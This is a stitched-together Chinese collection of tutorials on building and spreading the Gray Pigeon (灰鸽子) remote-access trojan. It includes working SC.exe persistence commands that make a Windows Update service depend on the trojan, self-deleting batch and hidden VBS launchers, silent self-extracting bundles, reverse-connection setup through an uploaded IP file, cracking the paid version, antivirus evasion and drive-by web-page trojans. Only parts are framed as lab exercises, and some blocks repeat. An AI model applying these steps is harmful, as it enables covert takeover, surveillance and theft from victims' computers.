灰鸽子远程控制教程

灰鸽子远程控制教程

灰鸽子远程控制，著名木马灰鸽子远程控制工具，附带中文版键盘记录，多功能图标修改器等！

准备工具：

鸽子服务端

IcoSprite图标更改器；

SC.exe服务添加删除更改工具；

winrar

程序特点：

自解压形式，双击即可

制作过程：

1. 首先自己配置一下鸽子服务端，配置时[启动项设置]这里面的都不要填，不要写入注册表，也不要用服务启动。其他的随你个人爱好。

2.用SC创建一个服务

运行CMD.EXE 在system32的目录下运行执行

SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi"

‘这句是用SC建立一个服务，服务名为huigezi，路径Binpath为

"%systemroot%\system32\gezi.exe"，类型type为own 与interact交互，启动类型start为自动，显示名DisplayName为"gezi"。

sc.exe descript_ion huigezi "不死鸽子"

‘这句是将huigezi服务的描述改为“不死鸽子”

sc config wuauserv depend= huigezi

‘配置huigezi使wuauserv服务依存此服务（wuauserv可以根据自己喜欢改成其它服务，这里的wuauserv是系统在Windows Update网站的自动更新服务）。

这里的目的是迷惑管理员，使其不敢轻易停止我们生成的服务，自己也可以多加点。

3.将这些从注册表导出，我个人经验是：瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为1.reg

4.创建一个BAT文件,并命名为update.bat

@regedit /s %systemroot%\system32\1.reg

@%systemroot%\system32\gezi.exe

@del /q /f /s %systemroot%\system32\1.reg

@del /q /f /s %systemroot%\system32\Update.vbs

@del /q /f /s %systemroot%\system32\Update.bat

5.创建一个vbs并命名为update.vbs

目的是为了作用是令bat里的内容以安静模式执行，这样就可以让cmd窗口跳出来了，增加了不少隐蔽性。

里面写上如下代码：

On Error Resume Next

set wshshell=createobject ("wscript_.shell")

a=wshshell.run ("cmd.exe /C %systemroot%\system32\Update.bat", 0, TRUE)

6.用我门配置出来的服务端，并命名为run.exe，用run.exe做一个自解压文件，并命名为gezi.exe.。

记得将解压模式为全部隐藏.解压后运行run.exe，当然你的服务端要自己做免杀，这里我就不多说了。八仙过海....

7.将gezi.exe 1.reg Update.vbs Update.bat 再用

winrar制作一个自解压文件，解压到%systemroot%\system32\ 解压后运行Update.vbs 当然解压模式依旧全部隐藏，替换同名文件

现在用rar捆绑出来的文件很多杀软都不杀，你也可以用系统自带的捆绑机，或其他的捆绑机

这个方法可以用到其他的木马中

捆出来的自解压文件也可以自己再加工:去掉右键用"winrar打开"

灰鸽子第一章：软件相关介绍：

灰鸽子[VIP 专业版]

1.只用一个端口来传输所有通讯数据！普通同类软件都用到了两个或两个以上的端口来完成！

2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑！软件智能读取系统设定的代理服务器信息，无需用户设置！

3.无需知道服务端IP，自动上线功能让服务端自动上线报道！灰鸽子专用的上线系统无需您注册免费域名才能使用,

同时也提供了备用上线方式，在我们的专用上线系统出现故障时，您可以使用备用上线方式来使用自动上线功能。在使用专用上线系统时，你还可以控制远程电脑通过Socks5代理来中转自动上线。

4.自动上线可以在第一次设置分组，自定义上线图像，上线备注等，这样都可以让你轻而易举的找到目标主机，同时设置连接密码保证了服务主机的安全性！同时具用牵手版的搜索符合条件主机的功能：

a.从主机窗口筛选：可以列出只有某个窗口的一批主机,可以轻松找到哪些人在玩某个游戏！

b.从主机进程筛选：可以列出运行了某个程序的一批主机,例如QQ.exe,就可以找到打开了QQ的自动上线主机有哪些了！

5.文件管理：管理远程电脑的文件系统,支持复制、粘贴、删除，断点下载、上传文件或文件夹，文件内容均以加密方式传输，确保通讯的安全性.

6.远程控制命令：包括远程系统信息、剪切板信息、进程管理、窗口管理、键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制！

7.注册表编辑器：可以像操作本机注册表一样的编辑远程注册表。

8.常用命令广播，让你控制主机众多主机更多的方便！详细的在线主机线表显示了：主机IP地址，地址位置，电脑名称，系统版本,备注等信息,

9.除了具有语音监听、语音发送，还有远程视频监控功能，只有远程计算机有摄像头，且正常打开没有被占用，那么你可以看到,远程摄像头捕获的图片！还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能！无需第三方软件支持！支持Windows9x/ME/2000/Xp/2003。

11.软件附带有四款实用工具：

a. EXE工具: 可以修改任何EXE文件图标，支持真彩色！

b. 内网端口映射器:它允许你将局域网内的服务映射到internet上，使你在局域网内部也能使用自动上线功能！

c. FTP服务器: 可以开本机

FTP服务！

d. Web服务器: 可以建立一个简单的Web服务器！

12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以录制为Mpeg-1文件格式.

13.全中文友好操作界面，让你一目了然，漂亮皮肤让使用时也倍感亲切！

功能简单介绍：

【1】对远程计算机文件管理：模枋Windows 资源管理器，可以对文件进行复制、粘贴、删除，重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用。

【2】远程控制命令：查看远程系统信息、剪切板查看、进程管理、服务管理、共享管理！

【3】捕获屏幕：不但可以连继的捕获远程电脑屏幕，还能把本地的鼠标及键盘传动作送到远程实现实时控制功能！

【4】视频语音，可以监控远程摄像头,还有语音监听和发送功能，可以和远程主机进行语音对话！

【5】telnet(超级终端).

【6】注册表模拟器：远程注册表操作就像操作本地注册表一样方便!

【7】命令广播：可以对自动上线主机进行命令广播，如关机、重启、打开网页，

筛选符合条件的机等，点一个按钮就可以让N台机器同时关机或进行其它操作！

【8】服务端以服务方式启动，支持发送多种组合键，可以轻松管理远程服务器！

【9】专用的自动上线系统，直接使用灰鸽子注册ID即可实现远程服务端自动上线！

【10】多种自动上线方式：专用上线、DNS解析域名、固定IP等，用户自由选择！

注册灰鸽子软件后享有：

⒈享用软件的所有功能,没有任何限制!

⒉能使用对应的灰鸽子注册版本，能得到此版后期修正的正式版本!

⒊可以使用我们的专用上线系统，无需其它域名和空间支持!

⒋得到我们更好的技术服务!

注：[VIP版] 包括VIP2005、Version 1.2、Version 2.0 !

[企业版]用户只能使用企业版！不能使用其它版本！

5.加入会员后，会自动加入官方论坛。享受官方技术支持

灰鸽子第二章：好马配好鞍，服务端正确配置。

灰鸽子是一款要交钱的软件，也就是说，你使用VIP版的话是要交给作者每年几十块钱的使用费（不作任何评论）因此网上也就有很多高手破解灰鸽子，让灰鸽子可以不用到灰鸽子的官方网站进行验证，从而可以不用交钱就可以使用，相关版本有：影子鹰破解专用版，爱儿破解版，以及华夏黑客联盟的灰鸽子sunray破解版。

今天我们就用"灰鸽子sunray破解版"来向大家详细解析这款木马的服务端配置方式，只可实验，不可做坏事，大家不喜欢请跳过这一章。

第一节：未雨绸缪，实验准备。

第一,关闭杀毒软件，这点不用我说了吧~~~因为是木马，下载了之后如果杀毒软件监控开着的话肯定会被删除的。

第二，当然是下载灰鸽子的软件啦~~~上网找，有很多~~~

第三，申请一个免费的主页空间，为什么要呢？因为灰鸽子是可以反弹式链接的，也就是说，服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。（这一点，等一下会详细解说）

第二节：实战开始。

把我们刚才下来的文件解压到某个文件夹，记住，不要改文件夹的名字，后面会用到。

解压的文件里面有以下几个文件：

H_Client.exe 这个是客户端的主要文件，可以配置文件，生成服务端，可以远程控制客户端。

http.exe 这个是本地http服务器，因为我们的灰鸽子是破解版的，通常正式版的灰鸽子会到官方的服务器上去验证你的软件是否正版，所以这个软件就是用来在本机子上建一个服务器，骗过软件的，从而达到破解的目的。

sunray.exe 这个里面其实也就只是一个host，它把https://www.wendangku.net/doc/572022996.html,这个网站的域名本地解析到本机，而不是解析到官方网站。vip_2005_0113.rar 这个是验证的软件，当我们的软件解析到本机的时候它就会

下载这一个到客户端，用来验证用的。

其它的文件还有config2005.asp，Operate.ini 还有四个文件夹，他们分别是(dat images login sound)我也不知道什么用的。应该是配置用的。

第一步：在你的电脑上新建一个ip.txt的文本文件，内容如下：

http://huigezi212.126.131.43:8000end其中212.126.131.43这个是我的电脑IP地址，8000是连接的端口，你可以把它写成你自己的IP

地址，端口一般不要去改动，然后把这个文件上传到你刚才申请的空间,如果你的电脑是动态IP的话，那你就要经常更新这个文件的内容，然后上传到空间，它的目的是客户端上线的话就会去这个网站读取这个文件，然后主动和

你取得连接。

第二步，首先运行sunray.exe，然后运行http.exe 点开始服务！

第三步，运行客户端，也就是H_Client.exe这个文件，

点击“自动上线”选项，有几个要点要说的，

1）“备用自动上线，URL转向域名或网页文件，这里呢，填写你刚才申请到的网站空间地址和ip.txt，比如http://你的网站地址

/ip.txt（当然，如果你是固定IP的话呢，可以写你的IP地址，那么前面的申请空间，上传文件几步可以省略）

2）“自动连接密码”，这个是表示你可以连接到的电脑所要用到的密码，如果为空的话，也没什么大不了的，顶多就是别人也可以用你的“肉鸡”

3）“配置说明”建议你把“只使用备用自动上线”前的勾打上，因为我们的软件是破解版的，官方的那个服务器我们是用不了啦~~~

4）“用户名称”“用户密码”这两个地方乱填些数字进去就行了，破解版用不了正式版的服务器的，它是服务器用来验证软件是否“正版”用的。

“安装选项”选项卡，建议修改一下名字，以免被发现，其它的自己看着办，看着喜欢就选吧~~~^_^

“启动项”这个很重要，建议你修改一下名字，它主要是服务端随系统自动启动用的，也是自己看着办。其中的“生成服务”这一项是为了达到隐藏用的，这也是我们经常说的手工清除木马的关键。也是长期以来很多人说无法清除灰鸽子的原因，因为它写成了服务，这个的优先级是系统级的，所有使用这台电

脑的用户都会启动木马。

“代理服务”，嘻嘻，就是你控制的电脑可以给我们做为一台代理服务器，说不定人家公布出来的代理服~务器地址有一部分是这些电脑的哦~~~

“高级选项”这里主要是用来对付杀毒软件和防火墙用的，默认是插入IEXPLORER，启动隐藏文件隐藏插入的IE进程，以及使用UPX压缩，这里就不用去改它的，默认就行。

"服务器图标”是用来伪装用的，你自己选项自己喜欢的图标吧~~~

配置好了就点击生成服务器，软件会优先从官方验证，但没效，出错了后就从本地服务器验证，这就是我们要本机建http服务器的原因。好了，到此，服务端就生成了，不要运行它，运行了你就会中木马的，（不准做坏事）

软件使用方法：当别人中了你的木马后，它会从你的网站读取ip.txt这个文件，然后主动连接到你的电脑，如果你此时也打开了客户端的话，连接建立成功，你可以控制这台电脑了。具体有什么内容你自己摸索，

如果你是动态IP地址的话，那么你要每次把新的ip.txt上传到网站上去

~~~

·没有路由密码权限时的鸽08-23 ·上网安全Vista自我防范10-11

·让濒临崩溃的Windows XP 10-11 ·有备无患，快速自制救急10-11

·要你好看!Windows看图工10-11 ·空间赞助网提供不同类型10-11

·讨论

net.exe和net1.exe的10-10 ·让3389远程桌面传输更通10-10

·巧妙入侵渗透赌博站10-10 ·Aspx空间扫权限工具10-10

·Windows2003最新提权工具10-10 ·易淘乐提供100M免费全能10-10

·系统开机密码忘了不着急10-09 ·

中意网络提供免费100M免10-09

·与众不同Windows XP开始10-08 ·让桌面图标翻跟斗在XP上10-08

·上海宽元站长资助计划-提10-08 ·个性化Windows XP的任务10-07

·趣盘提供

3G免费网络硬盘10-07 ·秀山热线提供200MB免费全10-07

·一次艰辛的提权过程10-06 ·成功入侵IT大卖场的渗透10-06

·mysqlhack- MYSQL利用工10-06 ·lanker一句话PHP后门客户10-06

·WIXI提供3G免费多媒体网

10-06 ·新人网络提供100M/ftp免10-06

·如何利用QQ带来高流量10-05 ·UuShare提供免费网络文件10-05

灰鸽子第三章：服务端工作方式：

灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事

，灰鸽子就成了很强大的黑客工具。这就好比火药，用在不同的场合，给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚，在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型（如等待连接还是主动连接）、主动连接时使用的公网IP （域名）、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户（通过代理上网）、公网用户和ADSL拨号用户等。

下面介绍服务端：

配置出来的服务端文件文件名为G_Server.exe（这是默认的，当然也可以改。

G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的

Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项，甚至是进程中的模块名。截获的函数主要是用来遍历文件、

遍历注册表项和遍历进程模块的一些函数。所以，有些时候用户感觉种了毒，但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

灰鸽子原理及上线方法剖析

原创作者ｕｎｉｓ 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助，两者之间有很大的区别，所谓远程协助需要经过被控端的授权允许，并且被控端可以看到控制者的所有操作，使之控制操作透明性；例如我们的QQ远程协助，就需要对方的允许控制进行操作，并且对方也能够看到我们的操作动作，远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样，远程控制只要在被控者电脑安装一个服务端，即可在不知情的情况下进行控制对方计算机以及对计算机其它操作，控制时不需要经过对方的许可就可以控制，而控制时操作的一些动作，对方也无法察觉到（除鼠标控制）。远程控制按控制类型可以分类为：（1）正向主动型远程控制（2）反向被动型。什么是正向主动型的呢？正向主动型是需要控制着主动去连接被控端，一般情况下，控制者必须知道需要被控制者的IP和端口，然后通过某种软件来进行控制被控者，例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP（端口）然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术，指的是在被控端下安装服务端之后，由被控端主动来寻找你的客户端监听端口软件连接来进行控制，这个好处就是不需要知道对方的IP地址和端口，被控端会自己主动来找我们的监听地址和端口，当我们发现被控端已经找到我们的监听地址和端口，我们就可以控制对方电脑，这样省去要知道对方的IP和端口的麻烦了，特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了，黑客专门使用某些控制软件在控制对方，反弹型远控软件更是数不胜数，例如：花鸽子（灰鸽子）、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控，并且也有讲解到Web型的正向型远控，正向型远控还有Radmin、3389远程桌面也可以值得大家去学习，关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件（又称客户端，生成出的木马叫服务端）数不胜数，甚至很多已经是源码爆出，对于各种远程控制软件来说，其实基本都是具备以下功能： 【屏幕监控】：可以查看被控制者的屏幕，保存捕获的被控制屏幕的截图。并且看到对方的一切操作，可以自由选定图像位色查看，还 可以选择是否控制对方鼠标、键盘，若选择即可控制对方的电脑鼠标、键盘，这一控制对方是可以看到鼠标被控制。 【文件管理】：可以在后台查看被控者的各个磁盘中的文件，直接显示隐藏文件，可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程

如何使用灰鸽子软件

灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据！普通同类软件都用到了两个或两个以 上的端口来完成！ 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑！软件智能读 取系统设定的代理服务器信息，无需用户设置！ 3.无需知道服务端IP，自动上线功能让服务端自动上线报道！灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式，在我们的专 用上线系统出现故障时，您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时，你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组，自定义上线图像，上线备注等，这样都 可以让你轻而易举的找到目标主机，同时设置连接密码保证了服务主机的安全性 ！同时具用牵手版的搜索符合条件主机的功能： a.从主机窗口筛选：可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏！ b.从主机进程筛选：可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了！ 5.文件管理：管理远程电脑的文件系统,支持复制、粘贴、删除，断点下载、 上传文件或文件夹，文件内容均以加密方式传输，确保通讯的安全性. 6.远程控制命令：包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制！ 7.注册表编辑器：可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播，让你控制主机众多主机更多的方便！详细的在线主机线表 显示了：主机IP地址，地址位置，电脑名称，系统版本,备注等信息, 9.除了具有语音监听、语音发送，还有远程视频监控功能，只有远程计算机 有摄像头，且正常打开没有被占用，那么你可以看到,远程摄像头捕获的图片！还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能！无需第 三方软件支持！支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具： a. EXE工具: 可以修改任何EXE文件图标，支持真彩色！ b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上，使 你在局域网内部也能使用自动上线功能！ c. FTP服务器: 可以开本机FTP服务！ d. Web服务器: 可以建立一个简单的Web服务器！ 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面，让你一目了然，漂亮皮肤让使用时也倍感亲切！ 功能简单介绍： 【1】对远程计算机文件管理：模枋Windows 资源管理器，可以对文件进行复制、粘贴、删除，重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用

灰鸽子使用教程图解

灰鸽子使用教程图解 （考虑到灰鸽子技术性较强和传插黑客技术要低调，将网络人远程控制教程放第一部份，灰鸽子教程放在了文章后面第二部份，请大家耐心观看） 第一部份：网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于：Netman办公版连接远程电脑时，对方会弹出提示，知道电脑正在远程连接，主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用，是一款免费的远程控制软件；Netman监控版使用会员登录后再连接，远程电脑无任何提示，对方不会发觉，主要用于监管孩童电脑，掌握孩子上网情况，保护孩子健康上网。 Netman监控版详细安装方法： 1.要实现远程监控控制，双方都要安装Netman监控版，双方电脑的安装方法一样，控制端同时也是被控端，只要知道ID和密码，双方可以互相控制。 2.下载软件解压缩后，双击“Netman监控版.EXE”，软件默认安装路径为“C:\Program

式，需要自己进入安装文件夹，双击iexplore.exe启动软件，这时会弹出一个提示窗口，问是否要让软件随系统启动，通常直接点“确定”。 3.完成以上操作后，再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能，所以呼出主界面后，应点击免费注册会员。

4.注册好会员后，点“选项”-“会员登录”，填上注册好的会员号。 5.第一次使用会员登录时，会弹出“设置控制密码”选项，需要注意的是，这里修改的不是前面填写的“登录密码”，而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”，导致第二次使用会员登录时，发现登录密码不正确。 出于安全考虑，网络人设置了“登录密码”与“控制密码”两道密码保护，“登录密码”用于登录会员ID，“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码，可点击“选项”-“修改密码”。

灰鸽子使用方法

灰鸽子使用方法++网页木马生成和制作详解++图片噢！！！ 2007-11-28 23:22:31| 分类：技术| 标签：|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的，我大概说下重点.首先点”自动上线”，在”网易免费域名更新IP”处先申请一个免费域名，比如https://www.wendangku.net/doc/572022996.html,，再点”更新IP到域名”，如果一次更新出错就反复多试几次，一般会成功 的 图1 再点”配置服务程序’，这里有几点值得注意: 1.”自动上线”处一定要填正确了，就填我们刚才申请的域名https://www.wendangku.net/doc/572022996.html,，下面的”自动上线连 接密码”可不填，填写是为了安全. 2.关于破解:这也是最关键的地方，在运行鸽子客户端的时候我们先要运行它的破解文件，我们双击hosts.exe，自解压路径不能改变，至于为什么不能变大家想下就会明白了，然后运行http.exe，点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了，我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”，到这服务端就生成了，每一步都是关键的，少一步， 服务端可能就不能生成.

二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的，必需要发给对方运行才行，那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的，我想最好是通过网页，让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多，大家去申请就是了.假设我们现在已经申请好了，空间地址为:https://www.wendangku.net/doc/572022996.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.wendangku.net/doc/572022996.html,/setup.exe”，”生成的网页名1，2” 可以随便填，保持默认即可。下面一栏”对于IE5，IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中，在”木马程序名称”处填写setup.exe，在”生成后的chm文件名”处保持默认icyfox.chm即可，在”用于存放上面chm文件的完整地址处填写https://www.wendangku.net/doc/572022996.html,/icyfox.htm，最后单击生成。将生成的

灰鸽子上线详细教程

Gray pigeons -- 灰鸽子是什么呢？ 灰鸽子简单的说它是远程监控软件,（黑客类）,当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分：客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端（简称：免杀），免杀的话那就是杀毒软件查不到那是一个木马程序！ 鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。这就好比火药，用在不同的场合，给人类带来不同的影响！（其他的我也说不清楚）如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。（如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用） 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻（前提是需要控制到宽带上网用户） 个人对鸽子的认识我对它的了解也不是全面的（现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧！） ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧！ 灰鸽子下载：https://www.wendangku.net/doc/572022996.html,/file/t06ef189fa（不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜）

灰鸽子远程控制软件

灰鸽子远程控制软件 【实验内容】 灰鸽子木马是网络上常见的并且功能强大的远程后门软件。采用dll注入技术，开启服务程序，从而实现远程控制的目的。本实验以灰鸽子木马为例进行木马的制作、种植和攻击。实验原理】 木马，全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出先在希腊神话传说中。一般木马程序都是隐蔽的进程,不易被用户发现。计算机木马程序一般具有以下几个特征： 主程序有两个，一个是服务端，另一个是控制端。服务端需要在主机执行。 当控制端连接服务端主机后，控制端会向服务端主机发出命令。而服务端主机在接受命令后，会执行相应的任务。 灰鸽子是国内一款著名后门软件，是国内后门软件的集大成者。具有丰富而强大的功能、灵活多变的操作、良好的隐藏性。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 【实验环境】 本地主机(WindowsXP)、Windows实验台，灰鸽子客户端软件。 实验的网络拓扑如图3.5.8-8所示，实验目标需首先确定所在主机实验台IP地址，并根据实验步骤填写正确的IP地址进行实验。 Windows实验台 本地主机 图3.5.8-8 【实验步骤】 一、木马制作 启动实验台，并设置实验台的IP地址，以实验台为目标主机进行攻防试验。 (1)在学生客户端，下载木马制作程序，打开客户端程序（可能需退出安全程序），灰 鸽子客户端的操作界面如下图所示。

(2)首先需要配置服务程序。点击“配置服务程序”，出现如下图所示的界面。 图 3.5.8-10 (3)在“自动上线设置”里，填写上“IP通知http访问地址、DNS解析域名或固定IP”, 此时填写学生客户端IP地址，然后设置连接密码，如下图所示。 图 3.5.8-11 (4)为了保证服务端程序运行的隐蔽性，我们可以把“安装选项”里的“安装后自动删 除安装文件”选中；如下图所示。

灰鸽子木马利用与防护

任务名称：灰鸽子木马利用与防护 任务目的与要求： 了解木马病毒对终端主机的安全威胁，以及木马病毒如何对主机进行攻击。本次任务要求学生学习灰鸽子木马远程控制软件的使用，通过实验可以了解木马和计算机病毒的区别，熟悉使用木马进行网络攻击的原理和方法。 实验任务涉及到的相关知识： 任务环境拓扑： 具体步骤： 1.登录windows2003，打开灰鸽子软件。 winxp windows2003

2.灰鸽子木马共有两个应用程序，其中一个是服务器程序，该程序由客户端配置产生，属于木马受控端程序，种木马时，需将该程序放入到受控端的计算机中，然后双击该程序即可；H_client.exe是木马的客户端程序，属于木马的主控端程序。首先点击H_client.exe打开客户端，选择“文件-配置服务器”配置服务器端。点击“生成服务器”即生成了一个服务器端，点击“确定” 3.登录到XP系统。点击“开始”-“运行”，输入“\\192.168.0.46（win2003的IP地址，已在win2003系统下通过ipconfig命令查看为准），可以通过共享查看win2003共享的文件,如图所示，将setup.exe拷贝到XP系统的桌面，然后双击运行。

4.返回win2003，点击“文件”-“增加主机”，输入XP的IP地址192.168.0.43（以在XP下通过ipconfig命令查看到得IP为准），点击确定。 5.双击文件目录浏览下的“我的电脑”，可以查看到主机为192.168.0.43的标识。然后双击192.168.0.43，可以查看到XP系统的目录及文件。此时点击C：\Documents and Settings\Administrator\桌面，可以查看到XP左面上放置的文件setup.exe服务器端。

灰鸽子内网上线教程

序： 灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的老大哥。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。 灰鸽子是一款反弹连接式的木马。现在上网一般是通过ADSL宽带拨号上网、modem上网、无线上网等等多种上网方式，有些是直接处于公网上的，但是也有很多都是用路由划分一个或多个vlan，通过NAT共用一个公网IP地址上网。所以这些用的IP都是内网IP。如果肉鸡中了灰鸽子的服务端，需要反弹回来连接灰鸽子客户端的8000端口。但是，拨号上网的IP不是固定不变而是动态IP，每次获得的IP都是不一样的；或者客户端的IP是一个内网IP。这个时候服务端就不知道该怎么去找到客户端并且连接客户端的8000端口了。（8000端口是灰鸽子的默认端口，这个端口是可以更改的） 要让鸽子的服务端每次都能找到客户端，反过来说就要让客户端的IP可以让服务端每次都可以找得到。不管客户端位于公网还是内网，让服务端找得到的方法其实是一样的。内网上线或者外网上线的方法有很多种：可以绑定一个DDNS 域名（动态域名），可以在路由器上做端口映射，也可以用鸽子自带的vport 工具做端口映射…… 总之方法很多，设置也很简单。如果有路由器的控制权呢可以进入路由器做鸽子的端口映射。如果没有路由器的控制权呢，只能找一个有着公网IP地址的肉鸡来做端口映射了。 因为我的上网环境是处在一个局域网，通过交换机和路由器公用一个公网IP上网，又不能获得路由器的控制权，所以我要讲的是vidc这个工具。因为用这个vidc最大的优点就是永远不会被杀毒软件查杀，这个vidc根本就不在杀毒软件的打击范围，这个不是我一个人说的，是很多黑客老前辈说的，并且我也亲身做过实验，用360杀毒、瑞星和国外杀软avast都进行过扫描，全部都是正常。 正文： 第一步： 把vidc的服务端vidcs传到公网的机子上，肉鸡或者朋友的电脑都可以。然后运行vidc服务端的命令是 vidcs.exe -端口号。比如vidcs.exe -5555.如图：

灰鸽子远程控制木马教程

一定要用迅雷下，不然可能下不了 【黑客视频教程-建立超级隐藏帐户】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/hideadmin1.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/hideadmin2.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/hideadmin3.wmv 【黑客视频教程-简单制作CHM木马】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/CHM1.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/CHM2.wmv 【黑客视频教程-简单破解Access数据库的密码】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/Access.wmv 【黑客视频教程-功能超强的BEAST远控木马】 https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/BEAST1.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/BEAST2.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/BEAST3.wmv https://www.wendangku.net/doc/572022996.html,/eschool/esafe2/BEAST4.wmv 